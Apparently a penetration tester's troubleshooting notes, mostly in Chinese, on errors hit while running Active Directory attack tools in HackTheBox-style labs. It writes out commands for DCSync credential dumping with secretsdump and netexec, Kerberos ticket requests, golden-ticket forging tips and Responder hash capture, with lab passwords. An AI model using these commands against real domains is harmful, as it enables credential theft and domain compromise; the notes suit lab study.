KRB_AP_ERR_SKEW(Clock skew too great)
impacket-getST htb.local/svc-alfresco:s3rvice -spn cifs/forest.htb.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
原因是与DC时间不同步,同步即可。
首先关掉同步
sudo timedatectl set-ntp off
sudo rdate -n 10.10.10.161
[sudo] password for kali:
Sun Oct 29 01:52:35 EDT 2023
# 2
sudo apt install ntpdate
sudo ntpdate 172.16.0.106
成功解决:
impacket-getST htb.local/svc-alfresco:s3rvice -spn cifs/forest.htb.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
[*] Saving ticket in svc-alfresco.ccache
cmd中使用net
组名需要用双引号包括,如果没有空格也可以不用引号。
powershell net group 'Exchange Windows Permissions'
net group "Exchange Windows Permissions"
ERROR_DS_DRA_BAD_DN
impacket-secretsdump htb.local/test1:'Test@123'@10.10.10.161
Impacket v0.11.0 - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter [*] Cleaning up...
没有DCSync的权限。
KDC_ERR_WRONG_REALM
RFC6806中包含此错误,通常是DNS配置错误。KDC host 配置,FQDN设置
RFC 6806 - Kerberos Principal Name Canonicalization and Cross-Realm Referrals
Disable NTLM Authentication
当NTLM认证被禁用时,会出现很多问题。
impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option
windapsearch -u ksimpson -p ksimpson -d scrm.local user-spns
FATAL[2023-11-22T08:22:32-05:00] LDAP Result Code 8 "Strong Auth Required": 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563 package=windapsearch
windapsearch --secure -u ksimpson -p ksimpson -d scrm.local -m user-spns
FATAL[2023-11-22T08:25:12-05:00] unable to read LDAP response packet: read tcp 10.10.16.16:50890->10.10.11.168:636: read: connection reset by peer package=windapsearch
ldapsearch -x -H ldap://10.10.11.168 -w ksimpson -b "cn=users,dc=scrm,dc=local" -D 'ksimpson@scrm.local'
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
certipy-ad报错
certipy-ad find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202
python 3.11会报错,降级解决
Got error: module ’enum’ has no attribute ‘_decompose’ · Issue #154 · ly4k/Certipy
AttributeError: ‘NoneType’ object has no attribute ‘sort_order’
AttributeError: module ’enum’ has no attribute ‘_decompose’
Unable to contact the server
get-aduser : Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
Fix: Unable to Find a Default Server with Active Directory Web Services Running – TheITBros
Restart-Service –name ADWS –verbose
KDC_ERR_PREAUTH_FAILED
确认用户名密码正确的情况下报错,可能是用户的 FQDN 或者 UPN 出错。
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
DCSync
成功的命令:
KRB5CCNAME=./test.ccache impacket-secretsdump cdc01.prod.corp1.com -k -no-pass
KRB5CCNAME=./test.ccache netexec smb prod.corp1.com --use-kcache --ntds
ERROR_DS_NAME_ERROR_NOT_UNIQUE
KRB5CCNAME=./test.ccache impacket-secretsdump cdc01.prod.corp1.com -k -no-pass -just-dc-user administrator
[-] ERROR_DS_NAME_ERROR_NOT_UNIQUE: Name translation: Input name mapped to more than one output name. [*] You just got that error because there might be some duplicates of the same name. Try specifying the domain name for the user as well. It is important to specify it in the form of NetBIOS domain name/user (e.g. contoso/Administratror).
STATUS_USER_SESSION_DELETED
KRB5CCNAME=./test.ccache impacket-secretsdump prod.corp1.com -k -no-pass -debug
[+] SMBConnection didn’t work, hoping Kerberos will help (SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.) [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[+] Exiting NTDSHashes.dump() because SMB SessionError: code: 0xc0000203 - STATUS_USER_SESSION_DELETED - The remote user session has been deleted.
KRB_AP_ERR_MODIFIED
KRB5CCNAME=./test.ccache impacket-secretsdump prod.corp1.com -k -no-pass -just-dc-user administrator -debug
[+] SMBConnection didn’t work, hoping Kerberos will help (SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
…
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
Exception calling “FindAll” with “0” argument(s)
使用 powerview 会遇到的报错,如下:
- The specified domain either does not exist or could not be contacted
- The server is not operational
优先添加 -server 参数,或者 -DomainController,这两个参数相等。
同时添加 -Cred 参数,通常 evil-winrm 登录的用户不包含凭据。
KDC_ERR_TGT_REVOKED
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
fortra/impacket — Ticketer: Added extra-pac implementation by 0xdeaddood · Pull Request #1545 · fortra/impacket 解决 PR,但是 240804 kali 测试依旧报错不知道是否更新
Tickerter Sapphire ticket issue · Issue #1605 · fortra/impacket 检查票据问题,有思路使用 describeTicket.py 查看票据详细信息。
KDC_ERR_TGT_REVOKED when using golden ticket from tickter.py · Issue #1601 · fortra/impacket 解决办法
使用 aes256 制作的票据会成功。
同时因为 Windows 从更新 KB5008380 开始获得了新的 PAC 结构和新的检查:KDC 现在检查用户是否确实存在且具有正确的 RID。因此,现在您需要为具有正确 RID 的现有用户制作一张票证,并使用前面提到的 -user-id 标志。
Responder Error starting
sudo responder -I tun0
Error starting TCP server on port 53, check permissions or other servers running.
sudo systemctl stop systemd-resolved
Skipping
Skipping previously captured hash for flight.htb\c.bum
So to fix that you have to restart Responder and pass it the -v flag and that will show the hash every time.
The Complete Responder & NTLM Relay Attack Tutorial - ethicalhackingguru.com
netexec/crackmapexec
当需要指定 FQDN 才能利用时,仅 –kdcHost 参数无效,还需指定 -k 参数,使用 Kerberos 认证。